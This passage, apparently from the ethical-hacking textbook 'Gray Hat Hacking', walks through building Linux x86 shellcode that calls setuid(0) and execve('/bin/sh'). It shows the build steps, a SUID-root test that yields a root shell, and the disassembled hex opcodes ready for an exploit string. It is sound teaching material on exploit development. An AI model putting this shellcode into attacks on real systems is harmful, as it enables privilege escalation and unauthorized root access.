Finally, the /bin is pushed onto
the stack. At this point, we have all that we need on the stack, so esp now points to the
location of /bin/sh. The rest is simply an elegant use of the stack and register values to
set up the arguments of the execve system call.
Assemble, Link, and Test
Let??™s check our shellcode by assembling with nasm, linking with ld, making the program
an SUID, and then executing it:
$ nasm -f elf sc2.asm
$ ld -o sc2 sc2.o
$ sudo chown root sc2
$ sudo chmod +s sc2
$ ./sc2
sh-2.05b# exit
Wow! It worked!
Extracting the Hex Opcodes (Shellcode)
Remember, to use our new program within an exploit, we need to place our program
inside a string. To obtain the hex opcodes, we simply use the objdump tool with the -d
flag for disassembly:
Gray Hat Hacking: The Ethical Hacker??™s Handbook
218
$ objdump -d ./sc2
./sc2: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: 31 c0 xor %eax,%eax
8048082: b0 46 mov $Ox46,%al
8048084: 31 db xor %ebx,%ebx
8048086: 31 c9 xor %ecx,%ecx
8048088: cd 80 int $Ox80
804808a: 31 c0 xor %eax,%eax
804808c: 50 push %eax
804808d: 68 2f 2f 73 68 push $Ox68732f2f
8048092: 68 2f 62 69 6e push $Ox6e69622f
8048097: 89 e3 mov %esp,%ebx
8048099: 50 push %eax
804809a: 53 push %ebx
804809b: 89 e1 mov %esp,%ecx
804809d: 31 d2 xor %edx,%edx
804809f: b0 0b mov $Oxb,%al
80480a1: cd 80 int $Ox80
$
The most important thing about this printout is to verify that no NULL characters
(\x00) are present in the hex opcodes.
Pages:
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421